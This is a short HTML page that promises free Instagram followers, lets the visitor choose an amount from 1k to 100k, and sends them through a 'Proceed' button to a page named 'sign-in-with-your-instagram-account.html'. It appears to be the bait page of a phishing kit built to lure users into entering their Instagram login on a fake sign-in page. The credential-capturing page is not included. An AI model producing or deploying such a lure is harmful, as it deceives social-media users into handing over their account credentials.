<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="Ads.css">
  <title>Boost your instagram followers</title>
</head>
<style type="text/css">
  #giffoto {
    width: 100%;
  }
  .boostwithus {
    width: 100%;
    text-align: center;
    font-size:25px;
  }
  .selctamount {
    font-size: 12px;
    text-align: center;
    border-top: 1px solid black;
    border-bottom: 1px solid black;
  }
  #editselected {
    background-color: white;
    color: black;
    width: 80%;
    height: 50px;
    border: 1px solid black;
    border-radius: 10px;
  }
  #proceedbutton {
    width: 100%;
    height: 50px;
                   margin: 5px;
                   border: 0;
                   box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);px;
                   background-color: #0095f6;
  color: #fff;
  padding: 10px;
  border: none;
  border-radius: 25px;
  cursor: pointer;
  font-size: 20px;
  }
</style>
<body>
  <header>
    <img src="Techyimmo.gif" id="giffoto">
  </header>
  <p>
    <h1 class="boostwithus">
     Boost your instagram followers with us it's for free
    </h1>
    <div class="selctamount">
    <h2>
      select the amount of followers you want your account to boost
    </h2>
    <select id="editselected" readonly="1k">
      <option> 1k </option>
      <option> 2k </option>
      <option> 3k </option>
      <option> 5k</option>
      <option> 6k</option>
      <option> 8k </option>
      <option> 10k </option>
      <option> 20k </option>
      <option> 50k </option>
      <option> 100k </option>
    </select>
    </div>
    <div id="proceedkey">
      <a href="sign-in-with-your-instagram-account.html">
      <button id="proceedbutton"> Proceed </button>
      </a>
      </div>
  </p>
</body>
  </html>
